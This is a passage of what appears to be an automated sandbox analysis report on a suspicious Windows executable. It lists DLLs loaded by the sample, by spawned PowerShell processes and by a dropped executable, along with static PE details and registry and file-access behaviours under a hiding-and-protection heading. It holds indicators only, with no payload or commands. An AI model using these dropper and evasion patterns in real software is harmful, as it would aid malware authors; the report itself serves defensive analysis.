Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: apphelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: sspicli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: wininet.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: rstrtmgr.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: ncrypt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: ntasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: dbghelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: iertutil.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: windows.storage.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: wldp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: profapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: kernel.appcore.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: winhttp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: mswsock.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: iphlpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: winnsi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: urlmon.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: srvcli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: netutils.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: dnsapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: rasadhlp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: fwpuclnt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: schannel.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: mskeyprotect.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: msasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: dpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: cryptsp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: rsaenh.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: cryptbase.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: gpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Section loaded: ncryptsslp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: YYjRtxS70h.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: YYjRtxS70h.exe Static file information: File size 13793970 > 1048576
Source: YYjRtxS70h.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: YYjRtxS70h.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: YYjRtxS70h.exe Static PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr Static PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04BE633D push eax; ret 10_2_04BE6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04BE2CFF push 04B807BAh; retf 10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04BE2C5C push 04B807BAh; retf 10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04B63A9B push ebx; retf 13_2_04B63ADA
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr Static PE information: section name: .text entropy: 6.864188260151341
Source: C:\Users\user\Desktop\YYjRtxS70h.exe File created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
